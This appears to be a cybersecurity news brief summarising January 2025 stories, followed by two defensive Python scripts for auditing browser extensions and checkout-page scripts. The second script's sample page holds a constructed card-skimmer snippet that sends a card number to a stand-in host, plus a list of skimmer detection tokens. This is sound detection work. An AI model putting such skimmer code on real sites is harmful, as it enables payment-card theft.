Daily Brief
Find articles below, see 'DETAILS' for generated summaries
Total articles found: 12827
Checks for new stories every ~15 minutes
| Date | Source | Category | Title | Summary | Details |
|---|---|---|---|---|---|
| 2025-01-08 00:16:59 | theregister | NATION STATE ACTIVITY | FCC Proposes Spectrum Auction to Fund Chinese Equipment Removal | FCC Chair Jessica Rosenworcel is calling for a spectrum auction to fund the removal of Huawei and ZTE equipment from U.S. networks, citing national security concerns. The "Rip and Replace" program began in 2021 with $1.9 billion but needs roughly $3 billion more after telcos and ISPs were unable to complete removals with the original funding. Congress has authorized the FCC to borrow up to $3.08 billion to keep the program going, with repayment to come from future spectrum auction proceeds. The proposed auction covers Advanced Wireless Services (AWS-3) spectrum, which mobile operators rely on for high-speed data and coverage. Under this arrangement private bidders, rather than general government funds, would cover the program's additional cost. Recent intrusions attributed to Chinese intelligence have underscored the urgency of securing network infrastructure against foreign threats. Rosenworcel is also pushing for stronger security requirements on telecom operators ahead of her imminent departure from the FCC. | Details |
| 2025-01-07 22:00:33 | bleepingcomputer | DATA BREACH | Casio Ransomware Attack Exposes Data of Thousands in October | Casio suffered a ransomware attack on October 5, 2024, that compromised the personal data of around 8,500 people, mostly employees and business partners, plus a small number of customers. The intrusion began with phishing and caused a significant IT systems outage. The Underground ransomware gang claimed responsibility on October 10 and threatened to leak confidential documents and personal data unless a ransom was paid. Casio has completed its investigation and is notifying affected individuals; it confirms that sensitive customer data and credit card information were not affected. The company did not negotiate with the attackers, on the advice of law enforcement and external security experts. Most affected services have been restored, though some remain down, and Casio reported separate incidents on its CASIO ID and ClassPad.net platforms. Some employees have received unsolicited emails connected to the attack, but no secondary damage has been reported so far. | Details |
| 2025-01-07 20:44:38 | bleepingcomputer | MALWARE | New Mirai Botnet Exploits Zero-Day Flaws in Global DDoS Attacks | A new Mirai-based botnet is exploiting zero-day vulnerabilities in industrial routers and smart home devices. It uses CVE-2024-12856 in Four-Faith routers alongside exploits for Neterbit routers and Vimar smart home devices. First observed in February 2024, the botnet now has about 15,000 daily active nodes, mostly in China, the U.S., Russia, Turkey, and Iran. Its primary purpose is DDoS against targets worldwide, with activity peaking in October and November 2024. Attacks are short, typically 10 to 30 seconds, but intense, exceeding 100 Gbps, and cause significant disruption. The botnet combines public and private exploits against DVRs, a range of routers, and smart devices. XLab recommends keeping device firmware updated, disabling unnecessary remote access, and changing default credentials. | Details |
| 2025-01-07 20:24:13 | bleepingcomputer | MISCELLANEOUS | U.S. Cyber Trust Mark Launched to Secure Smart Devices | The White House has introduced the U.S. Cyber Trust Mark, a cybersecurity label for internet-connected consumer devices. The label indicates that a product meets security criteria set by the National Institute of Standards and Technology (NIST), including unique default passwords, data protection, regular software updates, and incident detection capabilities. A QR code on the label links to detailed security information, such as secure setup and update procedures. Amazon, Google, Samsung, and other major companies have committed to the program, and companies are expected to be able to submit products for testing in 2025. The program is intended to raise consumer awareness of device security and push manufacturers to prioritize it. The Federal Communications Commission (FCC) has finalized the rules and approved Cybersecurity Label Administrators to manage use of the mark. | Details |
| 2025-01-07 19:03:11 | bleepingcomputer | MALWARE | BIOS Vulnerabilities Threaten DNA Sequencers with Malware Risk | BIOS flaws in Illumina's iSeq 100 DNA sequencer leave the device open to bootkit attacks that could compromise device integrity and manipulate data. Eclypsium found that the firmware lacks standard write protections and runs an outdated BIOS, making unauthorized firmware modification easier. The device is exposed to LogoFAIL, Spectre v2, and MDS, and Secure Boot is not in use, so nothing validates the integrity of the boot code. An attacker could brick the device or alter sequencing results, affecting medical research and treatment decisions. The sequencer is built on an OEM motherboard from IEI Integration Corp., raising the concern that other medical or industrial devices using IEI boards carry similar weaknesses. Illumina has issued a BIOS fix, but it is unclear how widely it has been distributed across deployed iSeq 100 units. Beyond financially motivated attacks, the flaws are a concern for nation-state actors interested in disrupting or manipulating medical research and public health. | Details |
| 2025-01-07 18:47:49 | bleepingcomputer | CYBERCRIME | CISA Alerts on Exploited Oracle and Mitel System Vulnerabilities | CISA has warned that critical vulnerabilities in Oracle WebLogic Server and Mitel MiCollab are being exploited in the wild. The Mitel flaw is a path traversal in MiCollab that lets unauthenticated attackers perform administrative actions and gain access to the system. The Oracle flaw, disclosed in 2020, still allows remote takeover of unpatched WebLogic servers. CISA has added both to its Known Exploited Vulnerabilities Catalog and given federal agencies until January 28 to patch. Although the directive binds only federal agencies, all organizations are urged to remediate. Both flaws give attackers deep access without authentication, putting system integrity and data at risk. | Details |
| 2025-01-07 18:12:14 | bleepingcomputer | DATA BREACH | Washington Sues T-Mobile for 2021 Data Security Failings | Washington state has sued T-Mobile over a 2021 data breach that exposed the personal information of more than 2 million state residents and 79 million people nationwide. The intrusion began in March 2021 and went undetected for roughly six months; T-Mobile learned of it only after customer data surfaced on the dark web. The lawsuit says T-Mobile downplayed the breach's severity, delayed notifying affected people, and sent notifications that omitted crucial details. Attorney General Bob Ferguson alleges the company failed to strengthen its security after earlier attacks, leaving it vulnerable. The suit also accuses T-Mobile of misrepresenting its security practices and giving customers a false sense of safety. The state is seeking an order requiring T-Mobile to follow industry-standard security practices and improve transparency, along with possible compensation for affected customers. T-Mobile said it was surprised by the lawsuit, is open to further dialogue, and has strengthened its security since the incident. | Details |
| 2025-01-07 17:46:48 | theregister | DATA BREACH | UN Aviation Agency Probes Data Theft, 42K Documents Exposed | The International Civil Aviation Organization (ICAO) is investigating a possible security incident after a cybercriminal claimed to have obtained 42,000 of its documents. The actor, using the alias Natohub, posted personal information including names, dates of birth, addresses, phone numbers, and employment details on a crime forum. Natohub has previously claimed attacks on high-profile targets including the US military and the United Nations. ICAO has taken urgent security measures and is investigating, and says it will not comment further until preliminary findings are in. The documents are reportedly for sale and contain extensive personal details, putting many individuals at risk. The incident follows a 2016 attack on ICAO that the agency was reported to have initially covered up, after which it reportedly made substantial security improvements. | Details |
| 2025-01-07 16:00:34 | bleepingcomputer | DATA BREACH | UN Aviation Agency Probes Security Incident After Document Leak | The International Civil Aviation Organization (ICAO) is investigating what it describes as a potential information security incident. A threat actor known as "natohub" claims to have stolen 42,000 documents from ICAO and has leaked them on BreachForums. The documents reportedly contain names, contact details, and employment information. The archive is said to total 2GB and to include more than 57,240 unique email addresses. ICAO has put immediate security measures in place, is conducting a comprehensive investigation, and has promised further updates once preliminary findings are available. The incident is part of a broader pattern of attacks on UN agencies, including breaches at UNDP in 2024 and UNEP in 2021 and network intrusions at the UN's Vienna and Geneva offices in 2019. | Details |
| 2025-01-07 15:04:51 | bleepingcomputer | CYBERCRIME | Malicious Browser Extensions Pose New Risks to Identity Security | More than 2.6 million users worldwide were affected by a campaign that compromised browser extensions and exposed cookies and identity data. Cyberhaven discovered the attack when its own extension was trojanized to steal Facebook credentials; follow-up investigation identified more than 35 affected extensions. Most of the compromised extensions have since been updated or removed from the Chrome Web Store. Around 60% of corporate users have browser extensions installed, and extensions can read cookies and browsing history and even capture keystrokes. Malicious extensions enable credential theft, account takeover, and session hijacking, and the affected extensions often fall into the productivity and VPN categories. Organizations are advised to audit installed extensions, assess their risk, and enforce strict controls on what may be installed. LayerX offers a complimentary service to help organizations audit and remediate risk from malicious browser extensions. | Details |
| 2025-01-07 14:49:30 | theregister | MISCELLANEOUS | DEF CON Security Chief Suffers Major Spinal Injury, Community Supports | Marc Rogers, DEF CON's head of security, has suffered a severe spinal injury that left him temporarily quadriplegic. Symptoms came on suddenly weeks after an incident whose initial X-ray showed little, and an MRI was delayed by insurance issues. Emergency surgery on the cervical vertebrae and damaged tendons restored much of his mobility and sensation. Rogers remains involved in security work, continuing from mobile devices. The episode has highlighted problems with the U.S. health insurance system, and friends have started a GoFundMe campaign to cover uninsured medical costs. The security community has responded strongly, raising significant funds toward his recovery. Rogers is expected to need several months of physical therapy and rehabilitation before a full recovery. | Details |
| 2025-01-07 14:24:06 | thehackernews | MALWARE | Major Firmware Vulnerabilities Detected in Illumina DNA Sequencers | Security vulnerabilities in Illumina's iSeq 100 DNA sequencer could let attackers install malware or permanently disable the device. The sequencer runs outdated BIOS firmware without Secure Boot or firmware write protection, so an attacker with access can modify it. Eclypsium's research describes serious deficiencies that could enable attacks disrupting critical medical and scientific research. Illumina has released a fix following responsible disclosure. The flaws could be used in ransomware attacks or by state actors seeking geopolitical disruption. Vulnerabilities disclosed in April 2023 exposed similar issues, showing the ongoing security challenges of medical research equipment. Because the device is used for tasks such as detecting genetic illness and supporting vaccine production, the stakes of such flaws are high. | Details |
| 2025-01-07 14:03:40 | bleepingcomputer | CYBERCRIME | Green Bay Packers' Online Store Hit by Credit Card Skimming Attack | The Green Bay Packers' official online store was hit by a credit card skimming attack carried out by a third-party threat actor in October 2024. Malicious code was detected on October 23, and the site's payment and checkout features were disabled immediately to prevent further theft. An investigation by external cybersecurity specialists found that customers' personal and payment information could have been accessed between late September and late October. Payments made with gift cards, Pro Shop accounts, PayPal, and Amazon Pay were not exposed to the skimmer. The Packers have instructed their hosting provider to remove the malicious code, rotate passwords, and check for additional vulnerabilities. Affected customers are being offered three years of free credit monitoring and identity theft restoration services through Experian. Customers are urged to monitor their accounts for suspicious activity and report potential fraud to their banks, the FTC, and state attorneys general. | Details |
| 2025-01-07 11:52:13 | thehackernews | MISCELLANEOUS | Farewell to Outdated Cybersecurity Technologies in Review | Legacy multi-factor authentication has been repeatedly defeated by advanced phishing, SIM swapping, and similar attacks, showing it no longer holds up against modern threats. The Cybersecurity and Infrastructure Security Agency (CISA) has urged organizations to move beyond these older MFA methods to phishing-resistant, FIDO2-based authentication. Signature-based antivirus has been overtaken by polymorphic malware and fileless attacks and is giving way to EDR and XDR platforms. Legacy VPNs, built on a perimeter model unsuited to distributed work, are being replaced by Zero Trust Network Access (ZTNA). Standalone password managers are being eclipsed by integrated identity platforms that offer phishing-resistant passwordless authentication. The article argues that moving to these next-generation technologies is necessary to keep pace with evolving threats, and that retiring tools that no longer provide adequate security is a constant part of the field. | Details |
| 2025-01-07 09:50:53 | thehackernews | NATION STATE ACTIVITY | New EAGERBEE Malware Variant Targets ISPs and Governments | Internet service providers and government organizations in the Middle East have been compromised by an advanced variant of the EAGERBEE malware. Built for espionage, the backdoor lets operators execute commands, manage files, and manipulate processes remotely through a set of plugins. Researchers link the updated variant to several espionage groups, including a Chinese state-aligned cluster tracked as Cluster Alpha that has conducted extensive espionage. The malware runs largely in memory to evade detection and uses SSL-encrypted command-and-control channels. In the observed intrusions, the ProxyLogon vulnerability was exploited to plant web shells, which were then used to deploy the EAGERBEE backdoor. Attacks also hit high-profile entities in Southeast Asia with the aim of stealing sensitive military and political information. Kaspersky's analysis highlights the malware's modular design, with plugins loaded in memory for stealth and flexibility. | Details |
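The browser-extension item (2025-01-07 15:04:51) recommends auditing installed extensions but does not say what to look at. The script below is an added example, not code from the article, LayerX or Cyberhaven: it reads extension manifests (Chrome stores them under `Extensions/<id>/<version>/manifest.json` in a profile) and scores the capabilities the article warns about, namely cookie access, traffic interception and content scripts on every page. The permission weights, the score thresholds and the two sample manifests are constructed assumptions for this example, not an industry standard.

```python
"""Triage browser-extension manifests for capabilities that enable cookie and
credential theft. Added example; weights and samples are constructed."""
import json
from pathlib import Path

# Permissions that reach session material, traffic or user input.
# Weights are an assumption for this example.
RISKY_PERMISSIONS = {
    "cookies": 3,             # read/write cookies for every granted host
    "webRequest": 2,          # observe all HTTP(S) requests and responses
    "webRequestBlocking": 2,  # modify or redirect requests (MV2)
    "scripting": 2,           # inject JS into pages (MV3)
    "debugger": 3,            # DevTools protocol: keystrokes, DOM, network
    "nativeMessaging": 2,     # talk to a native host process
    "clipboardRead": 2,
    "tabs": 1,                # URLs and titles of open tabs
    "history": 1,
    "identity": 1,
    "management": 1,
}
BROAD_HOSTS = {"<all_urls>", "*://*/*", "http://*/*", "https://*/*"}


def host_patterns(manifest: dict) -> list:
    """Every host pattern the extension may act on (MV2 puts them in
    `permissions`, MV3 in `host_permissions`; content scripts have `matches`)."""
    patterns = []
    for key in ("host_permissions", "optional_host_permissions", "permissions"):
        for p in manifest.get(key, []):
            if isinstance(p, str) and ("://" in p or p == "<all_urls>"):
                patterns.append(p)
    for cs in manifest.get("content_scripts", []):
        patterns.extend(cs.get("matches", []))
    return patterns


def triage(manifest: dict) -> dict:
    """Return a risk score and the findings that produced it."""
    score, findings = 0, []
    perms = set(manifest.get("permissions", [])) | set(manifest.get("optional_permissions", []))
    for p in sorted(perms):
        if p in RISKY_PERMISSIONS:
            score += RISKY_PERMISSIONS[p]
            findings.append(f"permission:{p}")
    if any(h in BROAD_HOSTS for h in host_patterns(manifest)):
        score += 3
        findings.append("broad host access")
    # A content script on every page plus cookie or network access is the
    # classic infostealer shape (keystroke capture + exfiltration).
    cs_everywhere = any(m in BROAD_HOSTS
                        for cs in manifest.get("content_scripts", [])
                        for m in cs.get("matches", []))
    if cs_everywhere and perms & {"cookies", "webRequest"}:
        score += 2
        findings.append("content script on all pages + cookie/network access")
    return {"name": manifest.get("name", "?"), "version": manifest.get("version", "?"),
            "score": score, "level": classify(score), "findings": findings}


def classify(score: int) -> str:
    """Thresholds are an assumption; tune them to your fleet's baseline."""
    return "high" if score >= 8 else "medium" if score >= 4 else "low"


def audit_profile(extensions_dir: str) -> list:
    """Triage every manifest under a Chrome profile's Extensions directory,
    worst first. Only the directory layout is assumed here."""
    results = [triage(json.loads(m.read_text(encoding="utf-8")))
               for m in Path(extensions_dir).glob("*/*/manifest.json")]
    return sorted(results, key=lambda r: r["score"], reverse=True)


# Constructed sample manifests (not real extensions).
SUSPICIOUS = {
    "name": "Productivity Helper", "version": "2.1.0", "manifest_version": 3,
    "permissions": ["cookies", "storage", "tabs", "scripting", "webRequest"],
    "host_permissions": ["<all_urls>"],
    "content_scripts": [{"matches": ["<all_urls>"], "js": ["cs.js"]}],
}
BENIGN = {
    "name": "Tab Counter", "version": "1.0.0", "manifest_version": 3,
    "permissions": ["storage", "activeTab"],
}

if __name__ == "__main__":
    for m in (SUSPICIOUS, BENIGN):
        print(json.dumps(triage(m)))
```

Run it against a real profile with `audit_profile("~/.config/google-chrome/Default/Extensions")` (expand the path first); anything scored high that is not on your allowlist is a candidate for removal, and its `version` is what you compare against the store listing, since the extensions in this campaign were compromised through updates rather than new installs.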
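The Packers item (2025-01-07 14:03:40) says malicious code sat on the checkout page for about a month before it was detected. A cheap control against that class of skimmer is to inventory the scripts a checkout page loads and alarm on anything new. The script below is an added example, not code from the Packers or their hosting provider: it parses the page, flags external scripts whose host is not on an allowlist, and flags inline scripts whose hash is not in a known-good baseline, annotating them with tokens typical of card skimmers. The sample page, the `.test`/`.invalid` hostnames, the allowlist and the token list are all constructed for this example.

```python
"""Inventory checkout-page scripts and flag unknown ones. Added example;
the sample HTML, hostnames and allowlist are constructed."""
import hashlib
from html.parser import HTMLParser
from urllib.parse import urlparse

# Strings that recur in card skimmers: obfuscation helpers plus form/field
# names. A hit is a hint for the analyst, not proof of malice.
SUSPICIOUS_TOKENS = ("atob(", "fromCharCode", "document.forms",
                     "cardnumber", "cvv", "cvc", "expiry")


class _ScriptCollector(HTMLParser):
    """Collect external script URLs and inline script bodies."""
    def __init__(self):
        super().__init__()
        self.external, self.inline = [], []
        self._in_script, self._buf = False, []

    def handle_starttag(self, tag, attrs):
        if tag.lower() != "script":
            return
        src = dict(attrs).get("src")
        if src:
            self.external.append(src)
        else:
            self._in_script, self._buf = True, []

    def handle_data(self, data):
        if self._in_script:
            self._buf.append(data)

    def handle_endtag(self, tag):
        if tag.lower() == "script" and self._in_script:
            self.inline.append("".join(self._buf).strip())
            self._in_script = False


def fingerprint(body: str) -> str:
    """Stable identity for an inline script body (whitespace-trimmed)."""
    return hashlib.sha256(body.strip().encode("utf-8")).hexdigest()


def audit(html: str, allowed_hosts: set, known_inline: set) -> list:
    """Return (kind, identifier, reason) for every script not in the baseline."""
    p = _ScriptCollector()
    p.feed(html)
    findings = []
    for src in p.external:
        host = urlparse(src).netloc.lower()
        # Relative/same-origin sources have no host; hash those files separately.
        if host and host not in allowed_hosts:
            findings.append(("external", src, "host not on allowlist"))
    for body in p.inline:
        digest = fingerprint(body)
        if digest not in known_inline:
            hits = [t for t in SUSPICIOUS_TOKENS if t.lower() in body.lower()]
            reason = "unknown inline script"
            if hits:
                reason += f"; matches {hits}"
            findings.append(("inline", digest[:12], reason))
    return findings


# Constructed baseline: hosts the checkout page is expected to load from,
# and the one inline snippet that legitimately ships with it.
ALLOWED_HOSTS = {"cdn.example-shop.test", "static.trusted-cdn.test"}
BASELINE_INLINE = "window.dataLayer = window.dataLayer || [];"
KNOWN_INLINE = {fingerprint(BASELINE_INLINE)}

# Constructed checkout page: three expected scripts plus an injected loader
# and an injected skimmer-like snippet exfiltrating the card field.
SAMPLE_HTML = """<html><head>
<script src="https://cdn.example-shop.test/js/checkout.js"></script>
<script>window.dataLayer = window.dataLayer || [];</script>
<script src="https://static.trusted-cdn.test/lib.js"></script>
<script src="https://cdn-metrics.invalid/stat.js"></script>
<script>
var _0x=atob('ZG9jdW1lbnQuZm9ybXM=');document.forms[0].addEventListener('submit',
function(){var c=document.querySelector('#cardnumber').value;
new Image().src='https://cdn-metrics.invalid/c?d='+btoa(c)});
</script>
</head><body></body></html>"""

if __name__ == "__main__":
    for f in audit(SAMPLE_HTML, ALLOWED_HOSTS, KNOWN_INLINE):
        print(f)
```

In practice the baseline is taken from a clean deploy and the audit runs from outside the hosting environment (a headless browser fetching the live checkout page on a schedule), so that an attacker who can edit files on the web host cannot also edit the baseline; a Content Security Policy with `script-src` limited to the same allowlist turns the same inventory into a preventive control.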